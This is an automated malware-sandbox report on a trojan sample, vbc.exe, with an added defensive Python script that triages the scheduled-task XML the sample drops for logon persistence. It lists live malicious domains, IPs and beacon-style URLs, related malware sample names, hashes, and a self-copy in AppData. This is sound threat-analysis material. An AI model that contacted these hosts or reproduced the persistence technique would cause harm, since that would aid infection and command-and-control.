118.27.122.222 | www.maikoufarm.com | Japan | | 7506 | INTERQGMOInternetIncJP | true
172.67.188.247 | www.septemberstockevent200.com | United States | | 13335 | CLOUDFLARENETUS | true
101.132.116.91 | www.mmj0115.xyz | China | | 37963 | CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | true
44.227.65.245 | www.sharpstead.com | United States | | 16509 | AMAZON-02US | true

                                            General Information

                                            Joe Sandbox Version:34.0.0 Boulder Opal
                                            Analysis ID:518412
                                            Start date:09.11.2021
                                            Start time:12:55:04
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 10m 45s
                                            Hypervisor based Inspection enabled:false
                                            Report type:light
                                            Sample file name:vbc.exe
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:29
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:1
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winEXE@10/8@14/6
                                            EGA Information:Failed
                                            HDC Information:
                                            • Successful, ratio: 2.8% (good quality ratio 2.6%)
                                            • Quality average: 75.8%
                                            • Quality standard deviation: 29.3%
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 0
                                            • Number of non-executed functions: 0
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            • Found application associated with file extension: .exe
                                            Warnings:
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                            • Excluded IPs from analysis (whitelisted): 23.211.6.115
                                            • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Not all processes were analyzed, report is missing behavior information
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
12:56:03 | API Interceptor | 1x Sleep call for process: vbc.exe modified
12:56:08 | API Interceptor | 41x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
118.27.122.222 | file0_stage3.dll | Get hash | malicious | Browse | www.nekomediphile.com/n8rn/?p2M=BeS87FoxVkTke2MRb0qima65PDce7tJfTymmK4/q26Kf4LPrWppSbx1BH8kQDaEu6kDG&zFNL=5jK4uHQH-rfXmT
 | HPMT ORDER LIST.exe | Get hash | malicious | Browse | www.ch-foster.com/n6be/?a6=2tOAPcEgYTHD567WF8XvxxEvgHLBbJMXTAUhjj7+D0ChXZUXC+Pn67n//wg0XKB52YMX&4hYl=8pPLKztPMLrhEvWP
44.227.65.245 | Quote request.exe | Get hash | malicious | Browse | www.dietjakarta.com/s2qi/?TJELpfLP=qOzazkHAVvIGDra8b9OWW7CQPYry4NAftY2oZLUdYfYDTW+xNyVbwU9NOeXebbzy0cbp&lZwxYz=y6AldH-
 | SAMPLES2.xlsx | Get hash | malicious | Browse | www.kisah.xyz/sywu/?8p2=USn/s/N3qxIF4+EyQZdH7vYZi5cG3dzFHZRqO94C2q7bkP8vqLkNegTqp14nFiAPIy6Ubg==&3f=0ltDIRtH
 | Purchase Order-10,000MT.exe | Get hash | malicious | Browse | www.brunchy.one/z4m5/?8pW8=zNPWEz3pIEHibvS4bsIXDPiznK4rKMrVGAhmY+HWnOPy3ASb809gbr8Dwg2gtflOJLni&gD=-ZfPOL
 | ITRli68rgq.exe | Get hash | malicious | Browse | www.innoattic.com/bs8f/?3fKPRDU=gPvbgkUrDAv1uZACg3Tla1oGEdPTt04jzJdg29vz63COe4p03SEL16juZWtXBmvFy2F4&of=9rSLDPtHxj9hfT
 | NUo71b3C4p.exe | Get hash | malicious | Browse | www.fleetton.com/fqiq/?08CT3r=3MX+rG6vdLdtgz7jmcjGUKQb8RZ/Wti45jSOZX8Y4yp8kay6zbO3XF8pw6EX/prOJZe4&fB8P=4hMPVF78e
 | November 2021 Update RFQ 3271737.exe | Get hash | malicious | Browse | www.jadesrc.com/nc26/?SBZL=d3TYBFuVdrdzP8EyjnH49SiPUjZ6Ux+6cUTZqX+JgS7gU0O8rbqz6CXYuXQkXkTXNal/&D48=c2MHtVyHNxCxXp7
 | QtDfFXiECh.exe | Get hash | malicious | Browse | www.203040302.xyz/pufi/?4hb=4hixbv&4h=SazsJgrxJuJNqlYiRzL3ozLk5u53xI01dSvrBHbbk0SB79U4uRUkWEJGSj7nxn+KPfiwTyd4PQ==
 | Invoice #00442811-20211029.2.exe | Get hash | malicious | Browse | www.indigobunk.com/b4a0/?EJBHHDyP=BfJ5Bx9UPWuRIZP3b2BXXNlSngsTafG3lcH0rf8/gIGUgH6boOVAW06sJRU4KdudULjy&y48=8pnHll3
 | vbc.exe | Get hash | malicious | Browse | www.sharpstead.com/ht08/?e4R=mF30mN7A1kBKKp3mrHfcBE8aj8d3j5TIPkteVwKSLkWL0x2hCorpOf84nnwyv5pwOfYu&j2MXQ6=3fH4ADA
 | Requested Items.xlsx | Get hash | malicious | Browse | www.magentavar.com/upi8/?B6=q+sSkz7sAwA4yBB5hWVCxKsuYiMLYHWGeaAggxOaMa4Qocc6YFkdsfdinLpG1SJGl/Ax9Q==&1bFX=0dhH
 | lCFjxhAqu3.exe | Get hash | malicious | Browse | www.thr33h3ad3ddragon.art/upi8/?vzr=YyCvSGoAtncS4QUVQZyNjC8cIPJnO/XAnIrSRYtWY0buq7vZ6yNDf+1DqJ4JQv1LHvgP&8pm4=_l6t
 | PO 800A3E4.exe | Get hash | malicious | Browse | www.analytico-australis.com/c249/?B48dyrUp=M3oufGH8Bm9b66gzFBXlxSE22zEX1ZdvV3sOjxFBFhL2n1u58TbTRysEXKK/l8JgYoT+&oZ=YlPhVdwxfPPXAPX
 | triage_dropped_file.exe | Get hash | malicious | Browse | www.fleetton.com/fqiq/?oJE=3MX+rG6vdLdtgz7jmcjGUKQb8RZ/Wti45jSOZX8Y4yp8kay6zbO3XF8pw6EX/prOJZe4&u6KLb=Wp6xUr6h5
 | PO 4910007391 CHANGZHOU.xlsx | Get hash | malicious | Browse | www.fleetton.com/fqiq/?k2Mtd=0bGdKhdpsjULqrw&i4Z4rjR=3MX+rG6qdMdpgj3vkcjGUKQb8RZ/Wti45jKeFUgZ8Sp9kre80Lf7BBErzfoB75v9CaDIsg==
 | m9azdNJhg2.exe | Get hash | malicious | Browse | www.nothernballet.com/scb0/?P0=oJTIyACWMBuXH8n/EzWjLujKpZPXvTg1NdfRIzqIYFKP8QC8fyVAQXGjBdWKl8hRd6mD&xX=8pjHvFr0NV
 | Copia de pago_pdf.exe | Get hash | malicious | Browse | www.jadeshelf.com/p4qi/?2d90bV=1bBLMh&X4=p5BmMS75A/JtgYvVfEDbSkCSvpUzgvUEAewD9F+BpXWJwpteyHvtZR0Kels1fz0BLcm1
 | 7ivFMbol8b.exe | Get hash | malicious | Browse | www.keenflat.com/m0np/?7n6T=A0GTW8QxnP4hPnA&ETJ8pHk=JnbxNM/rTFifoybGWxqKaXuLsTV7lalyqj1QG2sxy/+1c2rYA5SuNyU7nbkA5B+D+0NP
 | EhB2SUfLy2.exe | Get hash | malicious | Browse | www.keenflat.com/m0np/?l8=JnbxNM/rTFifoybGWxqKaXuLsTV7lalyqj1QG2sxy/+1c2rYA5SuNyU7nbkqmxOD62FP&YZsPJr=HJEL06c80X
 | 1SGErShR6f.exe | Get hash | malicious | Browse | www.commentcard.club/9gdg/?-Zy0C=qf3xl6MENRZ21DZ7gzuwiwLEYsFOD+EdiSexsqSt7LhuNUdogHACIO8bybDoj5UhYm+TCOWmJA==&lN=5jot7b-
 | Peq0Amq9EP.exe | Get hash | malicious | Browse | www.bittywire.com/qs23/?m6A=hl8hup_P5x&5jOl7vcx=iP0xukhXBAsLs4o+4LAMqW8C7tqrmiTZ/jO8lNLuZc/21gA7KI5zfXAl5NvJFH5jMmYiJAEXuw==
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
www.sharpstead.com | vbc.exe | Get hash | malicious | Browse | 44.227.65.245
ghs.googlehosted.com | P. INVOICE.exe | Get hash | malicious | Browse | 142.250.203.115
 | PRODUCT LIST.doc | Get hash | malicious | Browse | 216.58.206.83
 | uLjkrnawIw.exe | Get hash | malicious | Browse | 216.58.208.147
 | f7e1vlOrJP.exe | Get hash | malicious | Browse | 142.250.185.179
 | pO3zAA9lwc.exe | Get hash | malicious | Browse | 142.250.185.211
 | company business card (2).exe | Get hash | malicious | Browse | 172.217.168.51
 | xUKQ7vGCmR.exe | Get hash | malicious | Browse | 142.250.185.211
 | jk6CjxfJsQ.exe | Get hash | malicious | Browse | 142.250.185.211
 | DHL202038,PDF.exe | Get hash | malicious | Browse | 142.250.181.243
 | PCB 102021.EXE | Get hash | malicious | Browse | 142.250.181.243
 | AL Bijjar Trading FZC Requirement.xlsx | Get hash | malicious | Browse | 142.250.181.243
 | pBFXGQZbY6.exe | Get hash | malicious | Browse | 142.250.181.243
 | kHS7OeVw4a.rtf | Get hash | malicious | Browse | 142.250.181.243
 | HIC INTERNACIONAL - DOCUMENTS(RFQ20212211).exe | Get hash | malicious | Browse | 172.217.168.51
 | shipping Docs.pdf.exe | Get hash | malicious | Browse | 172.217.168.51
 | RFQ21116.exe | Get hash | malicious | Browse | 172.217.168.51
 | rundll32.exe | Get hash | malicious | Browse | 142.250.203.115
 | nf15RFi8vl.exe | Get hash | malicious | Browse | 142.250.203.115
 | New Offer to Thalassa Imports nv-sa._200317.xlsx.exe | Get hash | malicious | Browse | 142.250.203.115
 | DHL_Delivery_Confirmation.exe | Get hash | malicious | Browse | 142.250.203.115
www.miabellavita.com | vbc.exe | Get hash | malicious | Browse | 172.67.132.7
                                            Match                   Associated Sample Name / URL                         Detection   Context
                                            CLOUDFLARENETUS         Vergi ödeme faturası 9 Kasım 2021 Salı,pdf.exe       malicious   172.67.217.17
                                                                    REQUEST FOR QUOTATION.exe                            malicious   172.67.199.195
                                                                    uCkIzRN4ZzUIzCY.exe                                  malicious   104.21.42.115
                                                                    kA1GNOTJ2VgnL02.exe                                  malicious   172.67.217.39
                                                                    setup_installer.exe                                  malicious   172.67.176.199
                                                                    TF -11082148.exe                                     malicious   104.17.207.37
                                                                    Proforma Invoice, New order.exe                      malicious   162.159.129.233
                                                                    PI 01KSD-AB2021.exe                                  malicious   162.159.133.233
                                                                    TqNOgkfVVu.exe                                       malicious   162.159.133.233
                                                                    Halkbank_Ekstre_20211108_073719_486930.exe           malicious   104.21.19.200
                                                                    ExportUSA Corp RFQ 6000567507.doc                    malicious   23.227.38.74
                                                                    CB7D321954760DE22CCBF59ECE43D94E503350B18203D.exe    malicious   172.67.128.223
                                                                    Halkbank_Ekstre_20211108_073719_486930.pdf.exe       malicious   104.21.19.200
                                                                    tanglebot.apk                                        malicious   172.67.136.207
                                                                    vaeSTdfo17.exe                                       malicious   162.159.134.233
                                                                    D1F610AF3C46FFF6C857BE0136C696604EB8E7466B4A7.exe    malicious   104.21.6.12
                                                                    F1F6AEEE9A42004E68765A83E9CBD51BC878A0AFD7C80.exe    malicious   104.21.6.12
                                                                    zJam66tNHE0o5Ai.exe                                  malicious   104.21.18.247
                                                                    com.sibche.aspardproject.app.apk                     malicious   104.18.29.147
                                                                    ATT00002.html                                        malicious   104.16.126.175
                                            INTERQGMOInternetIncJP  Quote request.exe                                    malicious   118.27.122.150
                                                                    Purchase Order - 10,000MT.exe                        malicious   118.27.122.221
                                                                    044b.pdf.exe                                         malicious   163.44.185.185
                                                                    jVjGBmjH6I.exe                                       malicious   157.7.107.193
                                                                    U3iFi37tNT.exe                                       malicious   118.27.122.216
                                                                    PdEfGHtczV.exe                                       malicious   157.7.44.214
                                                                    v7KGQZ70fj.exe                                       malicious   157.7.107.193
                                                                    ITRli68rgq.exe                                       malicious   150.95.255.38
                                                                    4Z5YpFMKR0.exe                                       malicious   118.27.122.216
                                                                    ja71FJcG4X.exe                                       malicious   150.95.255.38
                                                                    Jrc9iR2XxH.exe                                       malicious   150.95.255.38
                                                                    Purchase Order-10,000MT.exe                          malicious   118.27.122.221
                                                                    iSBX2z1os7.exe                                       malicious   150.95.255.38
                                                                    8PRjJeUifB                                           malicious   133.130.112.159
                                                                    fdnVx1v1hc.exe                                       malicious   157.7.107.193
                                                                    mxHkqAIYT0                                           malicious   118.27.80.208
                                                                    NCh22JHZDm.exe                                       malicious   150.95.255.38
                                                                    Draft shipping docs CI+PL_pdf.exe                    malicious   150.95.255.38
                                                                    SHIPPPING-DOC.xlsx                                   malicious   150.95.255.38
                                                                    AA9FF4E33F61DD2FC164A21D0A53397F19B7F9C64D786.exe    malicious   157.7.144.96
                                            No context
                                            No context
                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vbc.exe.log
                                            Process:C:\Users\user\Desktop\vbc.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:modified
                                            Size (bytes):1216
                                            Entropy (8bit):5.355304211458859
                                            Encrypted:false
                                            SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                            MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                            SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                            SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                            SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):22284
                                            Entropy (8bit):5.353881910568184
                                            Encrypted:false
                                            SSDEEP:384:ItCDbSTnJDrnVXf1JNcbnusm7u5c+Ohhbm1dOYlw4aC:DyJ/npXS7usw8c+gbqflT
                                            MD5:0D67EDF91C635D7850EF610BA3B6E80E
                                            SHA1:4E3C716CEB41805F4EBEC8E01E2D69660457AF54
                                            SHA-256:A6D8C87A3E4DA7C3B5B97E35199A28779B014EFAC9AD41187D1C4BD15B66299D
                                            SHA-512:7792499CA1DF9740430C00C695D4D981015FCAC4514F27F60824262CECB1330B68070722233CB1026B1AEBE4D8343370A1051C20500A532C536AB72B9FE36B45
                                            Malicious:false
                                            Reputation:low
                                            Preview: @...e...........|.......h.....w.t.....y...I..........@..........D...............fZve...F.....x.)........System.Management.AutomationH...............<@.^.L."My...:R..... .Microsoft.PowerShell.ConsoleHost4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lq3sbvzj.wru.psm1
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:very short file (no magic)
                                            Category:dropped
                                            Size (bytes):1
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:3:U:U
                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                            Malicious:false
                                            Preview: 1
                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nn4teh0l.j21.ps1
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:very short file (no magic)
                                            Category:dropped
                                            Size (bytes):1
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:3:U:U
                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                            Malicious:false
                                            Preview: 1
                                            C:\Users\user\AppData\Local\Temp\tmpAA68.tmp
                                            Process:C:\Users\user\Desktop\vbc.exe
                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1663
                                            Entropy (8bit):5.177504026201777
                                            Encrypted:false
                                            SSDEEP:24:2dH4+SEqC/dp7hdMlNMFpdU/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBFtn:cbhH7MlNQ8/rydbz9I3YODOLNdq3t
                                            MD5:E7C4E7B70996F6294F5F000C26736157
                                            SHA1:44691C6732ED527445581CE7953F35BA9FB57A0C
                                            SHA-256:241672A3BAC2F63F1BD79B1F48B7C1F5B4F2D471652EFA5D367549DB7E85E084
                                            SHA-512:7C28CFD9CF220B143D08741D0BF601D06328508AD571D9258C456BF0FBD4A7B9E7E9648A7C1913834AD6915AB80DE265ED59BE81292BE32EA3535781E5AE5B00
                                            Malicious:true
                                            Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAv
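The tmpAA68.tmp file listed above is a Task Scheduler definition (the kind imported with schtasks /Create /XML) that vbc.exe wrote to the user's Temp directory: a LogonTrigger for computer\user, LeastPrivilege run level, and a RegistrationInfo date in 2014, years before the 2021 run recorded in the PowerShell transcript further down. The script below is an added triage example for this report, not code from Joe Sandbox or from the sample. Its input is constructed from the visible preview; the preview is cut off before the <Actions> element, so the action command used here (the dropped copy C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe, which the report does list) is an assumption, as are the user-writable-path and template-date heuristics. It also handles a failure mode visible in the listing: the XML declaration claims UTF-16 while the report identifies the file as ASCII text, so a parser fed the raw bytes trusts the declaration and rejects the file.

```python
"""Triage a Task Scheduler XML definition such as the one dropped to %TEMP%.

Added example for this report; not Joe Sandbox code and not the sample's code.
The heuristics are this example's own assumptions, not the sandbox's rules.
"""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Constructed from the tmpAA68.tmp preview in the report. The <Actions> block is
# not visible there and is an ASSUMPTION: it points at the self-copy the report
# does list, C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe.
SAMPLE_TASK_XML = (
    b'<?xml version="1.0" encoding="UTF-16"?>\r\n'
    b'<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">\r\n'
    b'  <RegistrationInfo>\r\n'
    b'    <Date>2014-10-25T14:27:44.8929027</Date>\r\n'
    b'    <Author>computer\\user</Author>\r\n'
    b'  </RegistrationInfo>\r\n'
    b'  <Triggers>\r\n'
    b'    <LogonTrigger>\r\n'
    b'      <Enabled>true</Enabled>\r\n'
    b'      <UserId>computer\\user</UserId>\r\n'
    b'    </LogonTrigger>\r\n'
    b'    <RegistrationTrigger><Enabled>false</Enabled></RegistrationTrigger>\r\n'
    b'  </Triggers>\r\n'
    b'  <Principals>\r\n'
    b'    <Principal id="Author">\r\n'
    b'      <UserId>computer\\user</UserId>\r\n'
    b'      <LogonType>InteractiveToken</LogonType>\r\n'
    b'      <RunLevel>LeastPrivilege</RunLevel>\r\n'
    b'    </Principal>\r\n'
    b'  </Principals>\r\n'
    b'  <Actions Context="Author">\r\n'
    b'    <Exec><Command>C:\\Users\\user\\AppData\\Roaming\\uZlkYhlkeLeaKC.exe</Command></Exec>\r\n'
    b'  </Actions>\r\n'
    b'</Task>\r\n'
)

# Locations a standard user can write to; persistence there needs no admin rights.
USER_WRITABLE = re.compile(
    r"(?:\\Users\\[^\\]+\\(?:AppData|Downloads|Desktop|Documents)\\|"
    r"%(?:APPDATA|LOCALAPPDATA|TEMP|TMP|USERPROFILE)%)",
    re.I,
)


def declared_encoding_lies(raw: bytes) -> bool:
    """True when the XML declaration claims UTF-16 but the bytes are 8-bit text
    (no BOM, no NUL bytes), as with tmpAA68.tmp: 'ASCII text' per the report."""
    head = raw[:64]
    claims_utf16 = re.search(rb'encoding\s*=\s*["\']utf-16', head, re.I) is not None
    looks_utf16 = head.startswith((b"\xff\xfe", b"\xfe\xff")) or b"\x00" in head
    return claims_utf16 and not looks_utf16


def parse_task(raw: bytes) -> ET.Element:
    """Parse a task definition while tolerating a wrong encoding declaration.
    A strict parser given the raw bytes honours the UTF-16 claim and fails on
    8-bit input, so the declaration is dropped before parsing."""
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
        text = raw.decode("utf-16")  # a genuine 'schtasks /Query /XML' export
    else:
        text = raw.decode("utf-8", errors="replace")
    text = re.sub(r"^\s*<\?xml[^>]*\?>", "", text, count=1).lstrip()
    return ET.fromstring(text)


def triage_task(raw: bytes, observed_year: int = 2021) -> dict:
    """Return the task's key fields plus the findings a responder would act on.
    observed_year is when the task was seen being registered (2021 here)."""
    root = parse_task(raw)
    commands = [(c.text or "").strip()
                for c in root.iterfind(".//t:Actions/t:Exec/t:Command", NS)]
    logon_enabled = root.findtext(".//t:Triggers/t:LogonTrigger/t:Enabled",
                                  default="", namespaces=NS).strip().lower() == "true"
    run_level = root.findtext(".//t:Principals/t:Principal/t:RunLevel",
                              default="", namespaces=NS).strip()
    reg_date = root.findtext("t:RegistrationInfo/t:Date", default="", namespaces=NS).strip()

    findings = []
    if logon_enabled:
        findings.append("LogonTrigger enabled: runs at every interactive logon")
    for cmd in commands:
        if USER_WRITABLE.search(cmd):
            findings.append(f"action lives in a user-writable path: {cmd}")
    if declared_encoding_lies(raw):
        findings.append("declaration says UTF-16 but the file is 8-bit text")
    # Heuristic (assumption): a registration date years before the observed
    # registration means the XML was copied from a template, not generated live.
    if reg_date[:4].isdigit() and int(reg_date[:4]) < observed_year - 1:
        findings.append(f"RegistrationInfo/Date {reg_date[:10]} predates observed registration")

    return {
        "commands": commands,
        "run_level": run_level,
        "registration_date": reg_date,
        "findings": findings,
        # persistence verdict: an action under the user profile that fires at logon
        "suspicious": logon_enabled and any(USER_WRITABLE.search(c) for c in commands),
    }


if __name__ == "__main__":
    result = triage_task(SAMPLE_TASK_XML)
    for line in result["findings"]:
        print("-", line)
    print("suspicious:", result["suspicious"])
```

Point it at a file recovered from C:\Users\<user>\AppData\Local\Temp\ or at a schtasks /Query /XML export; exports are genuine UTF-16 with a BOM and take the first branch of parse_task, while the dropped template takes the second.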
                                            C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe
                                            Process:C:\Users\user\Desktop\vbc.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):368640
                                            Entropy (8bit):7.907277852559704
                                            Encrypted:false
                                            SSDEEP:6144:hC9EDghMkMs4P2CW2RT9cERCtbjqg2vcy8a9KI75uhPLTDcfAYGQLomQVHb:h1DghTjPymtvqg4ya9R75AzOAcomQV7
                                            MD5:C4A1BDD685E346B7604F93357A922875
                                            SHA1:6B8FCCADCF1977F5850FAA1C47617343FAFC0FF4
                                            SHA-256:728B23F75C1140A1763DD7C75083F2AE57AFEB6FFA3D7B33A9BA1B4904C4566D
                                            SHA-512:15FD260D342AB48A0A23293EE49DC50150B0EDAABF869F9E2A80BB7946FE5483CB4D89037352AD76008FFCA703B93A68361F1D4FFD1E09F37996D5DF47BC6CA3
                                            Malicious:true
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...(-.a................................. ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......Xe...X..........`...V............................................0..:.......+.&.+.&. ....8............s....}.....s....}.... ....(4...:....&..%.."...s....}......|.....|....(#......|.....|....(#... .....:T...&. .'..}.... ....(5...99...&.(3...8....& ....8".......}......}....8I... ............E................................@...9... ....8.......}..... ,...}.....(5...:....& ....(4...:....&.*...+.&..{....*2+.&...}....*....0..........+.&....8.....*...+.&..{....*2+.&...}....
                                            C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe:Zone.Identifier
                                            Process:C:\Users\user\Desktop\vbc.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):26
                                            Entropy (8bit):3.95006375643621
                                            Encrypted:false
                                            SSDEEP:3:ggPYV:rPYV
                                            MD5:187F488E27DB4AF347237FE461A079AD
                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                            Malicious:false
                                            Preview: [ZoneTransfer]....ZoneId=0
                                            C:\Users\user\Documents\20211109\PowerShell_transcript.921702.y9Ja5PCc.20211109125606.txt
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):5845
                                            Entropy (8bit):5.388652589278563
                                            Encrypted:false
                                            SSDEEP:96:BZQ6VN2qDo1ZNZ96VN2qDo1ZDTdLjZP6VN2qDo1ZwmbbhZm:l
                                            MD5:5428FD441DF4A369B3F10ABABA0933E5
                                            SHA1:8BCE64310E0A65B24558C7C05A99177624050540
                                            SHA-256:27FE637C478154A60944EC3E45F92277C28630985AFEC17CB104516F4970C5E8
                                            SHA-512:C7799055AD9994136A3B1AC72BFB37FC1AD79E58A24C5BEBE771444BAEE810AB50D11609305E6F8017B21188C027824D54920A516801399B92D78124B358BF28
                                            Malicious:false
